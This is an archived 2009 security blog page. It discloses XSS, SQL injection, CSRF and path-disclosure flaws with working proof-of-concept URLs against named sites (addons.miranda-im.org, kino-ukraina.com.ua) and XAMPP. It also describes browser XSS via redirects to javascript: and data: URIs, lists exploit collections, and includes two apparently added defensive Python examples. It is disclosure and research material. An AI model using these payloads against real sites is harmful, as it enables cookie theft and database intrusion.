Archive for August, 2009

Vulnerabilities on addons.miranda-im.org

23:57 04.08.2009

In December, on 13.12.2008, I found Cross-Site Scripting vulnerabilities in the project http://addons.miranda-im.org. I will notify the project's administration about them shortly.

Earlier I already wrote about vulnerabilities on addons.miranda-im.org.

XSS:

POST request on the page http://addons.miranda-im.org/login.php, in the Username field. This vulnerability is already fixed (due to changes in how the login form works).

POST request on the page http://addons.miranda-im.org/login.php?action=lostpwd

"><script>alert(document.cookie)</script>

In the fields: Username and E-mail.

Cross-Site Scripting attacks via redirectors

21:44 04.08.2009

This is the English version of my article Cross-Site Scripting attacks via redirectors.

In this article I will tell you about using redirectors in different browsers to conduct Cross-Site Scripting attacks. These can be conducted to steal cookies or to access the web site's pages in order to mount various advanced attacks (when there is a connection between the code executed via the redirector and the site), and also to conduct phishing attacks and execute JavaScript code (when there is no such connection).

Besides the fact that redirectors allow redirecting to malicious and phishing sites (which is the Redirector vulnerability), there are other variants of attacks using them. In particular, in my articles Redirectors' hell and Hellfire for redirectors I wrote about using redirectors for DoS attacks. Already in January 2008 I planned to write an article about various attacks using redirectors (I was planning to make an anthology of attacks via redirectors), which I will certainly do, but now I will tell about one of these attacks: XSS attacks via redirectors.

There are two types of (server-side) redirectors: location-header redirectors, which work via the Location header, and refresh-header redirectors, which work via the Refresh header.

In different browsers (via vulnerabilities in them) XSS attacks are possible with different redirectors. The attacks are carried out by redirecting to a javascript: URI or a data: URI.

Attack #1

As I wrote about Cross-Site Scripting vulnerabilities in Mozilla, Internet Explorer, Opera and Chrome, in the browsers Mozilla 1.7.x (and previous versions), Mozilla Firefox 3.0.8 (and previous versions), Internet Explorer 6 (and previous versions, but not IE7 and IE8), Opera 9.52 (and previous and next versions) and Google Chrome 1.0.154.48 (and previous and next versions) an XSS attack via refresh-header redirectors is possible. The attack is carried out by redirecting to a javascript: URI.

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=javascript:alert(document.cookie)
which returns the Refresh header in the response:
Refresh: 0; URL=javascript:alert(document.cookie)
the code will execute in the context of this site.

This vulnerability in browsers can be used for conducting reflected XSS attacks.

Attack #2

As I wrote about Cross-Site Scripting vulnerabilities in Mozilla, Firefox and Chrome, in the browsers Mozilla 1.7.x (and previous versions), Mozilla Firefox 3.0.12 (and previous and next versions) and Google Chrome 1.0.154.48 (and previous and next versions) an XSS attack via refresh-header redirectors is possible. The attack is carried out by redirecting to a data: URI (with or without base64).

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
which returns the Refresh header in the response, and the code will execute in the browser:
refresh: 0; URL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b

Because in Firefox 3.0.12 and Google Chrome the code executes not in the context of this site, there is no access to cookies, but in old Mozilla it can be done. This vulnerability in (modern) browsers can be used for conducting phishing attacks and executing JavaScript code.

Attack #3

As I wrote about Cross-Site Scripting vulnerabilities in Firefox and Opera, in the browsers Mozilla Firefox 3.0.12 (and previous and next versions) and Opera 9.52 (and previous and next versions) an XSS attack via location-header redirectors is possible. The attack is carried out by redirecting to a data: URI (with or without base64).

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b
which returns the Location header in the response, and the code will execute in the browser:
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Because in Firefox and Opera the code executes not in the context of this site, there is no access to cookies. This vulnerability in browsers can be used for conducting phishing attacks and executing JavaScript code.

Both types of redirectors, location-header and refresh-header, are very widespread on the Internet, but location-header redirectors are the most widespread. So the vulnerabilities which work via location-header redirectors pose the biggest threat. In particular, via this vulnerability in browsers attacks via redirection services are possible, as I wrote concerning the vulnerability at tinyurl.com. It allows spreading malware via redirection services, when the code of an exploit is set instead of the address for redirection.

Attack #4

All modern browsers don't allow execution of JavaScript code by redirecting to a javascript: URI in location-header redirectors. But as my research showed, it's not always so. As I wrote about Cross-Site Scripting vulnerabilities in Mozilla and Firefox, in the browsers Mozilla 1.7.x (and previous versions) and Mozilla Firefox 3.0.12 (and previous and next versions) an XSS attack via location-header redirectors which use the answer "302 Object moved" is possible. The attack is carried out by redirecting to a javascript: URI (and it's also possible to conduct the attack with a data: URI).

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=javascript:alert(document.cookie)
which returns the Location header in the response:
HTTP/1.x 302 Object moved
Location: javascript:alert%28document.cookie%29

The browser will show the "Object Moved" page. On clicking the link "here" the code will execute in the context of this site.

This vulnerability in browsers can be used for conducting Strictly social XSS attacks.

Attack #5

After the initial publication of the article, Aung Khant informed me on 24.08.2009 about a vulnerability in Maxthon 3 Alpha (3.0.0.145) with Ultramode, which allows execution of JavaScript code by redirecting to a javascript: URI in location-header redirectors. It's a variation of attack #4 (which I checked but did not find in other browsers, but he found it in Maxthon). If in that case the XSS attack is possible via location-header redirectors which use the answer "302 Object moved", then in this case the attack is possible with any 301 and 302 answers of redirectors. The attack is carried out by redirecting to a javascript: URI.

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=javascript:alert(document.cookie)
which returns the Location header in the response:
Location: javascript:alert%28document.cookie%29

The browser will show the "Unable to connect to the site" page. On clicking the link "Refresh the page" the code will execute. Besides, Maxthon 3 Alpha shows the same behaviour in attacks #3,4,5 (the code executes not in the context of the site).

This vulnerability in Maxthon can be used for conducting Strictly social XSS attacks.

Note that in the case of execution of JavaScript code by redirecting to a data: URI, when the code executes not in the context of this site, the danger still exists, because these vulnerabilities can be used for conducting phishing attacks and executing JavaScript code (for malware spreading).

The main advantages of this attack method for criminals, compared with ordinary redirection to their own site, are, first, that they don't even need to have a site (so it will be harder to trace them, and it will also be impossible to shut their site down), and second, that no anti-phishing or anti-malware filter (in browsers or email) will be able to filter them out, because there will be no such address in its database (since a data: address is used rather than an http: address), i.e. a bypass of all filters is possible. So it's necessary to fix all the mentioned vulnerabilities in browsers.

Attack #6

As I wrote about the Cross-Site Scripting vulnerability in Mozilla, Firefox and other browsers, in the browsers Mozilla 1.7.x (and previous versions) and Mozilla Firefox 3.0.19 (and previous and next versions), and potentially in other browsers, an XSS attack via location-header redirectors which use the answer "302 Found" is possible. The attack is carried out by redirecting to a javascript: URI (and it's also possible to conduct the attack with a data: URI). This attack is similar to attack #4.

Method of attack:

With a request to a script at the web site:
http://site/script.php?param=javascript:alert(document.cookie)
which returns the Location header in the response:
HTTP/1.x 302 Found
Location: javascript:alert(document.cookie)

The browser will show the "Found" page. On clicking the link "here" the code will execute in the context of this site.

This vulnerability in browsers can be used for conducting Strictly social XSS attacks.

Attacks #7,8

In the article Cross-Site Scripting via redirectors 301 and 303 in different browsers I described two more attacks via redirectors with statuses 301 and 303. These are attacks via data: and javascript: URIs.
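Every attack above depends on the same server-side defect: script.php copies an attacker-chosen target into a Location or Refresh header without checking what it is. While the browser fixes the article calls for are outstanding, the redirector itself can refuse such targets. The following Python is an added example, not code from the article or from any project it mentions; the host allowlist, SITE_ORIGIN and the function names are assumptions made for the illustration, and the inputs in the demo are the article's own PoC values plus a few legitimate ones.

```python
"""Hardened server-side redirector: added example, not the article's code.

Only absolute http(s) URLs on an allow-listed host, or site-relative paths,
ever reach a Location or Refresh header. javascript:, data: and every other
scheme are refused, as is any host outside the list and any value carrying
whitespace or control characters. SITE_ORIGIN and ALLOWED_HOSTS are
constructed for the example (the article's PoCs use "http://site").
"""
from typing import Optional
from urllib.parse import unquote, urljoin, urlsplit

SITE_ORIGIN = "http://site/"            # constructed origin of the redirecting site
ALLOWED_HOSTS = {"site", "www.site"}    # constructed allowlist of redirect hosts


def safe_redirect_target(target: str) -> Optional[str]:
    """Return an absolute URL that is safe to redirect to, or None.

    The value is percent-decoded once, so "javascript:alert%28...%29" and
    "%6Aavascript:" are seen for what they are. It is then rejected rather
    than cleaned up if it contains whitespace or control characters (CR/LF
    header injection, "java<TAB>script:" tricks), if its scheme is anything
    but http/https, or if it points at a host outside ALLOWED_HOSTS.
    """
    decoded = unquote(target)
    if any(ch.isspace() or not ch.isprintable() for ch in decoded):
        return None
    parts = urlsplit(decoded)
    scheme = parts.scheme.lower()
    if scheme == "":
        # No scheme: a site-relative path is fine, but "//evil/..." is a
        # scheme-relative URL that leaves the site; it shows up as a netloc.
        if parts.netloc:
            return None
        absolute = urljoin(SITE_ORIGIN, decoded)
    elif scheme in ("http", "https"):
        absolute = decoded
    else:
        return None          # javascript:, data:, vbscript:, file:, ...
    host = urlsplit(absolute).hostname
    if host not in ALLOWED_HOSTS:
        return None          # also catches "http://site@evil.example/" style tricks
    return absolute


def redirect_headers(target: str, use_refresh: bool = False):
    """Status code and headers a redirector should emit for a requested target.

    A rejected target falls back to the site's front page instead of echoing
    the attacker-controlled value; the same validated URL is used whether the
    redirector is of the location-header or the refresh-header type.
    """
    url = safe_redirect_target(target) or SITE_ORIGIN
    if use_refresh:
        return 200, [("Refresh", "0; URL=" + url)]
    return 302, [("Location", url)]


if __name__ == "__main__":
    # Targets taken from the article's PoCs plus a few legitimate ones.
    for t in ("javascript:alert(document.cookie)",
              "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2b",
              "javascript:alert%28document.cookie%29",
              "//evil.example/", "/news/1", "https://www.site/a?b=1"):
        print(repr(t), "->", redirect_headers(t))
```

Rejecting rather than repairing is the point of the design: stripping "javascript:" or whitespace out of a value invites the %6Aavascript: and tab variants, whereas refusing anything that is not an http(s) URL on a known host after one percent-decode closes the whole class regardless of which browser, or which of the 301/302/303 answers, is on the other end. The same check has to run before a Refresh header is emitted, since attacks #1 and #2 go through that header.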

[Update: 05.08.2009]

As I checked, Mozilla Firefox 3.0.13 is also vulnerable to attacks #2,3,4.

In all browsers which are vulnerable to attacks #1,4, the JS code executes in the context of the site.

[Update: 22.08.2009]

As I found with the help of Aung Khant from YEHG Team, the following browsers are also vulnerable:

Google Chrome 2.0.172.28, 2.0.172.37 and 3.0.193.2 Beta - vulnerable to attacks #1,2.

QtWeb 3.0 Build 001 and 3.0 Build 003 - vulnerable to attacks #1,2,3.

Safari 4.0.3 - vulnerable to attacks #1,2.

Opera 10.00 Beta 3 Build 1699 - vulnerable to attacks #1,3.

SeaMonkey 1.1.17 - vulnerable to attacks #1,2,4, and in #1,2,4 the JS code executes in the context of the site.

[Update: 25.08.2009]

New information from Aung Khant from YEHG Team:

Firefox 3.6 a1 pre - vulnerable to attacks #1,2,3,4, and in #1,2,4 the JS code executes in the context of the site.

Firefox 3.7 a1 pre - vulnerable to attacks #2,3,4.

Orca Browser 1.2 build 5 - vulnerable to attacks #2,3,4.

Maxthon 3 Alpha (3.0.0.145 and 3.0.2.2) with Ultramode (Apple's WebKit emulation) - vulnerable to attacks #1,2, and also vulnerable to attacks #3,4,5 as Strictly social XSS.

[Update: 05.08.2010]

Added information about attack #6.

[Update: 07.08.2010]

New information:

Mozilla Firefox 3.0.19 - vulnerable to attacks #2,3,4,6, and in #4,6 the JS code executes in the context of the site.

Firefox 3.5.11 - vulnerable to attacks #2,3,4,6, and in #4,6 the JS code executes in the context of the site.

Firefox 3.6.8 - vulnerable to attacks #2,3,4,6, and in #4,6 the JS code executes in the context of the site.

Firefox 4.0b2 - vulnerable to attacks #2,3,4,6, and in #4,6 the JS code executes in the context of the site.

Opera 10.53 - vulnerable to attacks #1,4,5,6.

[Update: 16.09.2012]

New information:

Firefox 3.5.19, Firefox 3.6.28 - vulnerable to attacks #2,3,4,6, and in #4,6 the JS code executes in the context of the site.

Firefox 10.0.7, Firefox 15.0.1 - vulnerable to attacks #2,3. In Firefox 10.0.7 and 15.0.1 attacks #4,6 are no longer possible: these vulnerabilities were silently fixed by Mozilla in Firefox 9.0.

Opera 10.62 - vulnerable to attacks #1,4,5,6.

[Update: 25.09.2012]

Added information about attacks #7 and #8.

Vulnerabilities on www.kino-ukraina.com.ua

19:22 04.08.2009

07.05.2009

In August, on 19.08.2008, I found a SQL Injection vulnerability, and today new SQL Injection and Cross-Site Scripting vulnerabilities, on the site http://www.kino-ukraina.com.ua. I will notify the site's administration about them shortly.

Earlier I already wrote about vulnerabilities on kino-ukraina.com.ua.

Detailed information about the vulnerabilities will appear later. The admins need to be given time to react.

04.08.2009

SQL Injection:

http://www.kino-ukraina.com.ua/?id=-1%27%20or%201=1/*

Already fixed as a result of changes on the site.

http://www.kino-ukraina.com.ua/showwait.php?wait_id=84%20and%20version()=5

http://www.kino-ukraina.com.ua/showwait.php?wait_id=-1%20union%20select%200,0,version(),0%23

http://www.kino-ukraina.com.ua/showfilm.php?film_id=88%20and%20version()=5

http://www.kino-ukraina.com.ua/showopen.php?opening_id=53%20and%20version()=5

XSS:

Most of the vulnerabilities are still not fixed.

Exploit collection

16:08 04.08.2009

This collection contains exploits in web applications:

  • Webspell 4 (Auth Bypass) SQL Injection Vulnerability (details)
  • Lito Lite CMS Multiple Cross Site Scripting / Blind SQL Injection Exploit (details)
  • Cybershade CMS 0.2b (index.php) Remote File Inclusion Exploit (details)
  • Joomla Component simple_review 1.x SQL Injection Vulnerability (details)
  • Ayemsis Emlak Pro (Auth Bypass) SQL Injection Vulnerability (details)
  • Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability (details)
  • The Rat CMS Alpha 2 (viewarticle.php id) Blind SQL Injection Exploit (details)
  • plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability (details)
  • PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability (details)
  • WSN Guest 1.23 (search) Remote SQL Injection Vulnerability (details)
  • PHPAuctionSystem (XSS/SQL) Multiple Remote Vulnerabilities (details)
  • Joomla com_phocadocumentation (id) Remote SQL Injection Exploit (details)
  • Joomla com_na_newsdescription (newsid) SQL Injection Exploit (details)
  • PHPAuctionSystem Insecure Cookie Handling Vulnerability (details)
  • K-Links Directory Blind SQL Injection Exploit (details)

URL Hiding - new method of URL Spoofing attacks

22:48 03.08.2009

This is the English version of my article URL Hiding - new method of URL Spoofing attacks.

Continuing my research of vulnerabilities in search engines, I will tell you about a new interesting method of URL Spoofing attacks, which I called URL Hiding. It can be used for conducting phishing attacks and for spreading malware (in particular, it can be used together with the previously described methods). I found this URL Hiding attack in Google, but other search engines can also be vulnerable.

This month, on 19.05.2009, while searching in Google, I found an interesting site whose URL is not shown in the SERP. I had seen such sites earlier while using Google (since 2000), but it's the first site whose address I wrote down. This site is http://_-lilit-_.photosight.ru.

site:_-lilit-_.photosight.ru

When URL Hiding is used together with the URL Spoofing methods which I wrote about earlier (when a long URL is made, e.g. using the "_" character), it improves the effectiveness of phishing and other attacks, because the long and suspicious URL will not be shown in the search engine's SERP, and when the user follows the link, he may not notice the URL (via URL Spoofing methods).

At first I thought that when an underscore is used (as in the case of http://_-lilit-_.photosight.ru), Google will not show the address in the SERP at all. But there is no such effect in the case of http://ane4ka-_.shalala.ru. Potentially it works only if the first character of the domain is an underscore.

I did a lot of research looking for sites with underscores which have no URL in the SERP, but didn't find any such sites (though I found one interesting bug in Google). So the method of attack on Google for hiding the address of a site in the SERP can use this approach (with an underscore at the beginning of the domain) or another one. But in any case the URL Hiding attack is dangerous, because it allows using search engines (Google in particular) for conducting phishing and other attacks.

Memory corruption in Adobe Flash Player

19:37 03.08.2009

A memory corruption in Adobe Flash Player has been discovered, which leads to code execution, as I wrote earlier when I gave an example of an exploit for Adobe Flash.

Vulnerable products: Adobe Flash Player 9.0, Flash Player 10.0, Acrobat 9.1, Adobe Reader 9.1.

Memory corruption when playing Flash.

  • Adobe Flash Vulnerability Affects Flash Player and Other Adobe Products (details)
  • Security advisory for Adobe Reader, Acrobat and Flash Player (details)

Vulnerability collection

16:11 03.08.2009

This collection contains vulnerabilities in web applications:

  • Aztech ADSL2/2+ 4 Port default password (details)
  • New slash packages fix multiple vulnerabilities (details)
  • Plesk 8.6.0 authentication flaw allows to gain virtual user priviledges (details)
  • Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 (details)
  • Sea-Surfing on the Motorola Surfboard (details)
  • TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload (details)
  • BizDirectory <== 2.04 Cross-Site Scripting Vulnerabilities (details)
  • CS-Cart <= 1.3.5 SQL Injection (details)
  • Blue Coat K9 Web Protection Response Handling Buffer Overflows (details)
  • Blue Coat K9 Web Protection "Referer" Header Buffer Overflow (details)

Cyberattack on US and South Korean sites cost no more than 50,000 dollars

22:42 01.08.2009

Officials from the US and South Korean governments believe that the cyberattack which the week before last hit seven South Korean sites (among them the official site of that republic's government), as well as a number of resources in the United States (among them the sites of the Secret Service, the Federal Trade Commission and the Department of Transportation), was organized by North Korea.

However, Amichai Shulman, CTO of the Californian company Imperva, has his own opinion on this matter. He believes there are no grounds to claim that the attack was directed exclusively from North Korea.

According to Shulman, zombies spread around the whole world were used to carry out this DDoS attack. Moreover, such an attack is comparatively cheap, about 50,000 dollars, which would allow not only the North Korean government but also the notorious Tony Soprano to order it.

Shulman believes the attack was indeed carried out by hackers sympathetic to North Korea, but that the North Korean government alone should not be blamed for organizing it.

Based on materials from http://www.xakep.ru.

New vulnerabilities in XAMPP

19:38 01.08.2009

25.06.2009

In June, on 23.06.2009, I found Cross-Site Scripting, Cross-Site Request Forgery, SQL Injection and Full path disclosure vulnerabilities in XAMPP. I will notify the developers about them shortly.

Earlier I already wrote about vulnerabilities in XAMPP.

Detailed information about the vulnerabilities will appear later. First I will notify the developers of the system.

01.08.2009

XSS:

http://site/xampp/ming.php?text=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

CSRF:

http://site/xampp/phonebook.php

It is possible to delete and add data in the test table (both via CSRF and via Insufficient Authorization vulnerabilities), and also to conduct SQL Injection via CSRF attacks.

XSS (persistent):

http://site/xampp/phonebook.php?lastname=%3Cscript%3Ealert(document.cookie)%3C/script%3E&firstname=1

http://site/xampp/phonebook.php?firstname=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/xampp/phonebook.php?firstname=1&phone=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection:

http://site/xampp/phonebook.php?action=del&id=-1%20or%201=1

http://site/xampp/phonebook.php?lastname=',sqlite_version())/*&firstname=1 (mq off)

http://site/xampp/phonebook.php?firstname=',sqlite_version(),1)/* (mq off)

http://site/xampp/phonebook.php?firstname=1&phone='),(sqlite_version(),1,'1 (mq off)

The attack is possible with access to the admin panel (via Insufficient Authorization) or via CSRF.

Full path disclosure:

http://site/xampp/phonebook.php?lastname='&firstname=1

http://site/xampp/phonebook.php?firstname='

http://site/xampp/phonebook.php?firstname=1&phone='

Vulnerable are XAMPP 1.6.8 and previous versions, and potentially subsequent versions (including the latest version, XAMPP 1.7.1).
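The phonebook PoCs above combine an INSERT built from the request fields (the "mq off" notes mark where magic quotes would merely have masked the quote character) with a form that performs writes for any origin that posts to it. The following Python is an added example, not XAMPP's phonebook.php; the sqlite3 schema, table name, form layout and function names are constructed for the illustration. It runs the page's phone-field payload through a string-built query, where it lands a second row containing sqlite_version(), then through a parameterized one, where the same input is stored literally, and gates the write behind a per-session CSRF token while reporting failures without a path or the SQL text.

```python
"""Hardened phonebook handler: added example, not XAMPP's phonebook.php.

Models the defects behind the PoCs above on a constructed sqlite3 table:
an INSERT assembled by string formatting versus bound parameters, and a
write accepted from any cross-site request versus one checked against a
per-session CSRF token. Schema, table name, form layout and function
names are all assumptions made for the example.
"""
import hmac
import secrets
import sqlite3

SQLITE_VERSION = sqlite3.sqlite_version        # what sqlite_version() returns at runtime
PHONE_PAYLOAD = "'),(sqlite_version(),1,'1"    # the phone-field payload from the PoC above


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE phonebook (lastname TEXT, firstname TEXT, phone TEXT)")
    return conn


def rows(conn) -> list:
    """All entries in insertion order, as (lastname, firstname, phone) tuples."""
    return [tuple(r) for r in conn.execute(
        "SELECT lastname, firstname, phone FROM phonebook ORDER BY rowid")]


def insert_unsafe(conn, lastname, firstname, phone) -> None:
    """String-built query: the input becomes SQL syntax. With PHONE_PAYLOAD the
    statement turns into a two-row VALUES list whose second row carries the
    result of sqlite_version(), which is exactly what the PoC reads back."""
    sql = ("INSERT INTO phonebook (lastname, firstname, phone) "
           "VALUES ('%s', '%s', '%s')" % (lastname, firstname, phone))
    conn.execute(sql)
    conn.commit()


def insert_safe(conn, lastname, firstname, phone) -> None:
    """Bound parameters: the driver passes the values separately from the
    statement, so quotes and commas in them stay data whatever magic_quotes
    is set to."""
    conn.execute("INSERT INTO phonebook (lastname, firstname, phone) VALUES (?, ?, ?)",
                 (lastname, firstname, phone))
    conn.commit()


def issue_csrf_token(session: dict) -> str:
    """Called when the form is rendered; the token lives in the user's session
    and is embedded in the form, so a page on another origin cannot know it."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]


def handle_add(conn, session: dict, form: dict) -> str:
    """Simulated POST handler; returns a short status instead of HTML."""
    expected = session.get("csrf", "")
    supplied = form.get("csrf", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: missing or wrong CSRF token"      # forged cross-site POST
    try:
        insert_safe(conn, form.get("lastname", ""), form.get("firstname", ""),
                    form.get("phone", ""))
    except sqlite3.Error:
        return "error: could not save entry"                # generic: no path, no SQL text
    return "ok"


if __name__ == "__main__":
    db = open_db()
    insert_unsafe(db, "", "1", PHONE_PAYLOAD)
    print("string-built INSERT stored:", rows(db))          # second row holds the version
    db = open_db()
    insert_safe(db, "", "1", PHONE_PAYLOAD)
    print("parameterized INSERT stored:", rows(db))         # payload kept as a literal
    sess = {}
    print(handle_add(db, sess, {"phone": "1"}))             # no token: rejected
    print(handle_add(db, sess, {"csrf": issue_csrf_token(sess), "phone": "1"}))  # ok
```

The two halves address different PoCs on the page: bound parameters remove the SQL Injection regardless of whether the request arrives through the admin panel or through a forged cross-site form, and the token check removes the CSRF route by which an unauthenticated page could make the victim's browser submit that form in the first place. The generic error string is what closes the Full path disclosure entries, since those rely on the database error being echoed back with the script's location.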

Exploit collection

16:29 01.08.2009

This collection contains exploits in web applications:

  • Megacubo 5.0.7 (mega://) Remote File Download and Execute Exploit (details)
  • DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability (details)
  • ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities (details)
  • Konqueror <= 4.1 XSS / Remote Crash Vulnerabilities (details)
  • PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability (details)
  • PowerNews 2.5.4 (news.php newsid) SQL Injection Vulnerability (details)
  • w3blabor CMS <= 3.3.0 (Admin Bypass) SQL Injection Vulnerability (details)
  • phpScribe 0.9 (user.cfg) Remote Config Disclosure Vulnerability (details)
  • Memberkit 1.0 Remote PHP File Upload Vulnerability (details)
  • PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit (details)
  • ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability (details)
  • phpSkelSite 1.4 (RFI/LFI/XSS) Multiple Remote Vulnerabilities (details)
  • Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability (details)
  • Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability (details)
  • Exploits mitsubishi GB-50A (details)